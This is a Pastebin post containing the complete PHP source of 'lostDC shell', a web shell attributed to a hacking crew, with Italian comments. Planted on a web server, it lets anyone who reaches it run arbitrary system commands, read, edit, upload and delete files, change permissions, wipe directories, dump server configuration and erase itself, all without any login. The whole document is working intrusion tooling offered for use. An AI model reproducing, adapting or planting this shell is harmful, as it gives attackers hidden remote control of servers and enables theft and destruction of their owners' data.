Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- /* *
- *
- * lostDC shell
- * PHP Shell scritta da lostpassword, D3vilc0de crew
- * Rilasciata sotto licenza GPL 2009/2010
- * Data rilascio: 25/12/2009 (eh si, il giorno di natale non avevo niente da fare)
- * La Shell presenta varie funzioni, ma rimane comunque in continuo aggiornamento
- *
- * */
- if (!function_exists("getTime")) {
- function getTime() {
- list($usec, $sec) = explode(" ", microtime());
- return ((float)$usec + (float)$sec);
- }
- }
- define("startTime",getTime());
- if (!function_exists("shellexec")) {
- function shellexec($cmd) {
- global $disablefunc;
- $result = "";
- if (!empty($cmd)) {
- if (is_callable("exec") and !in_array("exec",$disablefunc)) {
- exec($cmd,$result);
- $result = join("\n",$result);
- } elseif (($result = `$cmd`) !== FALSE) {}
- elseif (is_callable("system") and !in_array("system",$disablefunc)) {
- $v = ob_get_contents();
- ob_clean();
- system($cmd);
- $result = ob_get_contents();
- ob_clean();
- echo $v;
- } elseif (is_resource($fp = popen($cmd,"r"))) {
- $result = "";
- while(!feof($fp)) {
- $result .= fread($fp,1024);
- }
- pclose($fp);
- }
- }
- return $result;
- }
- }
- function getperms ($file) {
- $perm = substr(sprintf('%o', fileperms($file)), -4);
- return $perm;
- }
- if (!function_exists("view_size")) {
- function view_size($size){
- if (!is_numeric($size)) {
- return FALSE;
- } else {
- if ($size >= 1073741824) {
- /* Conversione da Byte a GigaByte */
- $size = round($size/1073741824*100)/100 ." GB";
- } elseif ($size >= 1048576) {
- /* Conversione da Byte a MegaByte */
- $size = round($size/1048576*100)/100 ." MB";
- } elseif ($size >= 1024) {
- /* Conversione da Byte a KiloByte */
- $size = round($size/1024*100)/100 ." KB";
- } else {
- /* Byte */
- $size = $size . " B";
- }
- return $size;
- }
- }
- }
- function getinfo()
- {
- $info = '';
- $info .= '[~]Versione PHP: ' .phpversion() .'<br />';
- $info .= '[~]Server: ' .$_SERVER['HTTP_HOST'] .'<br />';
- $info .= '[~]Indirizzo IP: ' .$_SERVER['SERVER_ADDR'] .'<br />';
- $info .= '[~]Software: ' .$_SERVER['SERVER_SOFTWARE'].'<br />';
- $info .= '[~]Charset: ' .$_SERVER['HTTP_ACCEPT_CHARSET'] . '<br />';
- $info .= ((ini_get('safe_mode') == 0) ? '[~]Safe Mode: <font color="#00FF33">OFF</font><br />' : '[~]Safe Mode: <font color="#FF3300">OFF</font><br />');
- $info .= ((ini_get('magic_quotes_gpc') == 0) ? '[~]Magic Quotes: <font color="#00FF33">OFF</font><br />' : '[~]Magic Quotes: <font color="#FF3300">ON</font><br />');
- if (is_callable("disk_free_space")) {
- $d = realpath(".");
- $free = disk_free_space($d);
- $total = disk_total_space($d);
- if ($free === FALSE || $free < 0) {
- $free = 0;
- }
- if ($total === FALSE || $total < 0) {
- $total = 0;
- }
- $used = $total-$free;
- $info .= "[~]Free space: ".view_size($free)."/".view_size($total)."<br />";
- }
- return $info;
- }
- if (!isset ($_GET ['dir'])){
- $dir = getcwd ();
- }
- else {
- $dir = $_GET ['dir'];
- }
- chdir ($dir);
- $current = getcwd ();
- $c = "?dir=" . $current;
- $home = "<html>
- <head>
- <title>lostDC - ".$current."</title>
- <style type=\"text/css\">
- body {
- color: #FFFFFF;
- background-color: black;
- font-family: Courier New, Verdana, Arial;
- font-size: 11px;
- cursor: crosshair;
- }
- a:link {
- color: #FFFFFF;
- text-decoration: none;
- }
- a:visited {
- color: #FFFFFF;
- text-decoration: none;
- }
- a:hover {
- cursor: crosshair;
- text-decoration: none;
- color: #808080;
- }
- a.head {
- text-decoration: none;
- text-color: #FF0000;
- }
- a.head:hover {
- cursor: crosshair;
- text-decoration: none;
- color: #FF0000;
- }
- table {
- font-size: 11px;
- }
- td.list {
- border: 1px solid white;
- font-size: 11px;
- }
- td.list:hover {
- background: #222;
- }
- #info {
- font-size: 12px;
- width: 50%;
- margin-left: 20%;
- text-align: left;
- }
- #foot {
- font-size: 12px;
- width: 65%;
- margin-left: 20%;
- text-align: left;
- }
- input:hover, textarea:hover {
- background: #808080;
- cursor: crosshair;
- }
- #perm {
- color: #FF0000;
- }
- </style>
- </head>
- <body>";
- print $home."<center><a href = \"".$_SERVER['PHP_SELF']."\"><img src = \"http://img367.imageshack.us/img367/9834/bannerdc2bygu.png\" border = \"none\"></a></center>";
- print "<hr size=\"1\" width=\"60%\" noshade />\n<div id = \"info\">[~]Directory corrente: " . getcwd () . "<br />".getinfo()."</div>\n<hr size=\"1\" width=\"60%\" noshade />";
- print "<table width = 60% height = 10% align = \"center\">\n";
- print "<tr>\n";
- print "<td>[ <a class = \"head\" href = '" . $c . "&mode=create'>New</a> ]</td>\n";
- print "<td>[ <a class = \"head\" href = '" . $c . "&mode=phpinfo'>PHP Info</a> ]</td>\n";
- print "<td>[ <a class = \"head\" href = '" . $c . "&mode=nopaste&action=ins'>No-Paste</a> ]</td>\n";
- print "<td>[ <a class = \"head\" href = '" . $c . "&mode=execute'>Shell Command</a> ]</td>\n";
- print "<td>[ <a class = \"head\" href = '" . $c . "&mode=hasher'>Hasher</a> ]</td>\n";
- print "<td>[ <a class = \"head\" href = '" .$c . "&mode=selfremove'>Self Remove</a> ]</td>\n";
- print "</tr></table><center>";
- $mode = $_GET ['mode'];
- switch ($mode) {
- case "edit":
- $file = $_GET ['file'];
- $new = $_POST ['new'];
- if (empty ($new)) {
- $fp = fopen ($file , "r");
- $cont = fread ($fp, filesize ($file));
- $cont = str_replace ("<textarea>" , "<textarea>" , $cont);
- print "<form action = '" . $c . "&mode=edit&file=" . $file . "' method = 'POST'>\n";
- print "File: ". $file . "<br />\n";
- print "<textarea name = 'new' rows = '25' cols = '100'>" . $cont . "</textarea><br />\n";
- print "<input type = 'submit' value = 'Edit'></form>\n";
- }
- else {
- $fp = fopen ($file , "w");
- if (fwrite ($fp , $new)) {
- header('Location: http://'.$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF'].'?dir='.$dir);
- }
- else {
- print "Impossibile editare " . $file . "<br />\n";
- echo "<a href=\"javascript:history.go(-1)\">Indietro</a><br /><br />\n";
- }
- }
- fclose ($fp);
- break;
- case "upload":
- $temp = $_FILES ['file'] ['tmp_name'];
- $file = basename ($_FILES ['file'] ['name']);
- if (!empty ($file)) {
- if (move_uploaded_file ($temp , $file)) {
- header('Location: http://'.$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF'].'?dir='.$dir);
- }
- else {
- print "Impossibile caricare " . $file . "\n";
- echo "<a href=\"javascript:history.go(-1)\">Indietro</a><br /><br />\n";
- }
- }
- break;
- case "download":
- $filename = $_GET['filename'];
- header("Pragma: no-cache");
- header("Expires: 0");
- header ( "Content-type: application/octet-stream" );
- header ( "Content-Disposition: attachment; filename=".$filename.";" );
- header ( "Content-Description: Download manager" );
- header ( "Content-Length: " . filesize ($filename) );
- readfile ($filename);
- break;
- case "rename":
- $old = $_GET ['old'];
- print "<form action = '". $c . "&mode=rename&old=" . $old . "' method = 'POST'>\n";
- print "New name: <input name = 'new'><br />\n";
- print "<input type = 'submit' value = 'Rename'></form>\n";
- $new = $_POST ['new'];
- if (!empty ($new)) {
- if (rename ($old , $new)) {
- header('Location: http://'.$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF'].'?dir='.$dir);
- }
- else {
- print "Impossibile rinominare " . $old . ".<p>\n";
- echo "<a href=\"javascript:history.go(-1)\">Indietro</a><br /><br />\n";
- }
- }
- break;
- case "chmod":
- if (chmod($_POST['tomod'], intval($_POST['mod'], 8)) == false) {
- print "Impossibile cambiare i permessi a " .$_POST['tomod'] . "<br />";
- echo "<a href=\"javascript:history.go(-1)\">Indietro</a><br /><br />\n";
- }
- else {
- header('Location: http://'.$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF'].'?dir='.$dir);
- // print "".$_POST['tomod']." con permessi: ".intval($_POST['mod'], 8)." e' stato chmoddato\n";
- }
- break;
- case "remove":
- $file = $_GET ['file'];
- if (unlink ($file)) {
- header('Location: http://'.$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF'].'?dir='.$dir);
- }
- else {
- print "Impossibile rimuovere " . $file . " <br />\n";
- echo "<a href=\"javascript:history.go(-1)\">Indietro</a><br /><br />\n";
- }
- break;
- case "selfremove":
- header('Location: http://'.$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF'].'?dir='.$dir.'&mode=remove&file='.__FILE__);
- break;
- case "makedir":
- if (mkdir($_POST['dir'], 0777) == false) {
- print "Impossibile creare directory; " .$_POST['dir'] . " <br />\n";
- echo "<a href=\"javascript:history.go(-1)\">Indietro</a><br /><br />\n";
- } else {
- header('Location: http://'.$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF']);
- }
- break;
- case "godir":
- $goto = $_POST['goto'];
- if (isset($_POST['goto'])) {
- chdir($goto);
- header('Location: http://'.$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF'].$c.'/'.$goto);
- } else {
- header('Location: http://'.$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF']);
- }
- break;
- case "elimina":
- $dire = $_GET['dire'];
- if ($handle = opendir($dire)) {
- $array = array();
- while (false != ($file = readdir($handle))) {
- if ($file != "." && $file != "..") {
- if(is_dir($dire.$file)) {
- if(!rmdir($dire.$file)) {
- delete_directory($dire.$file.'/');
- }
- }
- else {
- unlink($dire.$file);
- }
- }
- }
- closedir($handle);
- rmdir($dire);
- }
- header('Location: http://'.$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF'].'?dir='.$dir);
- break;
- case "create":
- $new = $_POST ['new'];
- if (isset($_POST['new'])) {
- if (!empty ($new)) {
- if ($fp = fopen ($new, "w")){
- header('Location: http://'.$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF'].'?dir='.$dir);
- }
- else {
- print "Impossibile creare " . $file . ".<p>\n";
- echo "<a href=\"javascript:history.go(-1)\">Indietro</a></center><br /><br />\n";
- }
- fclose ($fp);
- }
- }
- else {
- print "<form action = '" . $c . "&mode=create' method = 'POST'>\n";
- print "<tr><td>New file: <input name = 'new'></td>\n";
- print "<td><input type = 'submit' value = 'Create'></td></tr></form>\n";
- }
- break;
- case "nopaste":
- switch ($_GET ['action']) {
- case "ins":
- print "<form action '" . $c . "&action=ins' method = 'POST'>\n";
- print "Title: <input type = 'text' name = 'title'><br />\n";
- print "Language: <input type = 'text' name = 'language'><br />\n";
- print "Script: <br /><textarea name = 'source' rows = '30' cols = '50'></textarea><br />\n";
- print "<input type = 'submit' value = 'Submit'></form>\n";
- if (!empty ($_POST ['title']) && !empty ($_POST ['language']) && !empty ($_POST ['source']))
- {
- $file = rand (1000000, 9999999);
- $fp = fopen ($file, "w");
- fwrite ($fp, $_POST ['title'] . "\n" . $_POST ['language'] . "\n\n" . $_POST ['source']);
- fclose ($fp);
- header ("Location: {$c}&mode=nopaste&action=view&id={$file}");
- }
- break;
- case "view":
- $id = $_GET ['id'];
- $fp = fopen ($id, "r");
- $read = fread ($fp, filesize ($id));
- print "<table border = '1'>\n<tr>\n<td>\n<pre>" . htmlentities ($read) . "</pre></td>\n</tr>\n</table>\n";
- fclose ($fp);
- break;
- }
- break;
- case "execute":
- $command = $_POST ['command'];
- if (!isset ($_POST['command'])) {
- print "<table>\n<form action = '" . $c . "&mode=execute' method = 'POST'>\n";
- print "<tr>\n<td><input type = 'text' name = 'command'></td>\n</tr>\n";
- print "<tr>\n<td><input type = 'submit' value = 'Execute'></td>\n</tr>\n</form>\n</table>";
- }
- else {
- $ret = shellexec($command);
- if ($ret == "") {
- print "Il comando non puo' essere eseguito sul server<br /><br /><br />\n";
- }
- else {
- print "Executing the following command:<br />\n";
- print "<textarea rows = '5' cols = '60'>".$command."</textarea><br />\n";
- print "Result:<br /> <textarea rows = '5' cols = '60'>".$ret."</textarea><br /><br /><br />\n";
- }
- }
- break;
- case "hasher":
- print "<table>\n<form action = '" . $c . "&mode=hasher' method = 'POST'>\n";
- print "<tr>\n<td><input type = 'text' name = 'hash'></td>\n</tr>\n";
- print "<tr>\n<td><select name = 'type'>\n";
- print "<option>md4</option>\n";
- print "<option>md5</option>\n";
- print "<option>sha1</option>\n";
- print "<option>gost</option>\n";
- print "<option>crc32</option>\n";
- print "<option>adler32</option>\n";
- print "<option>whirlpool</option>\n";
- print "</select></td>\n</tr>";
- print "<tr>\n<td><input type = 'submit' value = 'hash'></td>\n</tr></form>\n</table>";
- if (!empty ($_POST ['hash']) && !empty ($_POST ['type'])) {
- print $_POST ['hash'] . ": " . "<b>" . hash ($_POST ['type'], $_POST ['hash']) . "</b>";
- }
- break;
- case "phpinfo":
- phpinfo();
- break;
- default:
- print "<table style = \"border: 1px solid black;\" width=\"60%\">\n";
- $files = scandir ($dir);
- foreach ($files as $out) {
- if (is_file ($out)) {
- print "<tr>\n<td width = \"55%\" class = \"list\"><a href = " .$c ."&mode=download&filename=".$out.">" . $out ."</a></td>\n";
- print "<td width = \"10%\" class = \"list\">".view_size(filesize($out))."</td>";
- print "<td class = \"list\"><div id = \"perm\">" . getperms ($out) . "</div></td>\n";
- print "<td class = \"list\" align = \"right\"><a href = '" . $c ."&mode=edit&file=" . $out . "'><img src = 'http://img189.imageshack.us/img189/9858/editj.gif' alt = \"edita file\" border = \"none\"></a>
- <a href = '" . $c ."&mode=remove&file=" . $out . "'><img src = 'http://img193.imageshack.us/img193/9589/deletef.gif' alt = \"elimina file\" border = \"none\"></a>
- <a href = '" . $c ."&mode=rename&old=" . $out . "'><img src = 'http://img51.imageshack.us/img51/7241/replyl.gif' alt = \"rinomina file\" border = \"none\"></a>
- </td>\n</tr>";
- }
- else {
- if ($out != "." && $out != "..") {
- print "<tr>\n<td width = \"55%\" class = \"list\"><a href = " . $c . "/" . $out . ">" . $out . "</a></td>\n";
- print "<td width = \"10%\" class = \"list\">FOLDER</td>";
- print "<td class = \"list\"><div id = \"perm\">" . getperms ($out) . "</div></td>\n";
- print "<td class = \"list\" align = \"right\"><a href = '" . $c ."&mode=elimina&dire=" . $out . "'><img src = 'http://img193.imageshack.us/img193/9589/deletef.gif' alt = \"elimina directory\" border = \"none\"></a></td>\n</tr>";
- }
- if ($out == "..")
- print "<td width = \"55%\" class = \"list\"><a href = " . $c . "/" . $out . ">..</a></td>\n";
- }
- }
- print "</table>\n";
- }
- print "</center>\n<hr size=\"1\" width=\"60%\" noshade />";
- print "\n</hr>";
- print "<table id = \"foot\">
- <tr>
- <td width = \"40%\">
- <form action = '" . $c . "&mode=upload' method = 'POST' ENCTYPE='multipart/form-data'>
- Upload file: <input type = 'file' name = 'file'>
- <input type = 'submit' value = 'Upload'>
- </form>
- </td>
- <td width = \"50%\">
- <form method=\"POST\" action=\"".$c."&mode=chmod\">
- Chmod File: <input type=\"text\" name=\"tomod\" value = \"filename\">
- <input type=\"number\" name=\"mod\" value = \"0666\">
- <input type=\"submit\" name=\"submit\" value=\"Chmod\">
- </form>
- </td>
- </tr>
- <tr>
- <td width = \"40%\">
- <form method=\"POST\" action=\"?dir='.$c.'&mode=makedir\">
- Mkdir: <input type=\"text\" name=\"dir\" value=\"namedir\">
- <input type=\"submit\" name=\"submit\" value=\"Create\">
- </form>
- </td>
- <td width = \"50%\">
- <form action = '" . $c . "&mode=create' method = 'POST'>
- New file: <input name = 'new'>
- <input type = 'submit' value = 'Create'></form>
- </td>
- </tr>
- <tr>
- <td>
- <form method = \"POST\" action = \"?dir='.$c.'&mode=godir\">
- Go dir: <input name = 'goto'>
- <input type = 'submit' value = 'Go'>
- </form>
- </td>
- </tr>
- </table><hr size=\"1\" width=\"60%\" noshade />\n</hr>";
- print "<center>[ Generation time: ".round(getTime()-startTime,4)." seconds | by <a href=\"http://lostpassword.hellospace.net\">lostpassword</a> and <a href = \"http://www.d3vilc0de.org\">D3vilc0de crew</a> ]</center>\n</body>\n</html>";
- ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement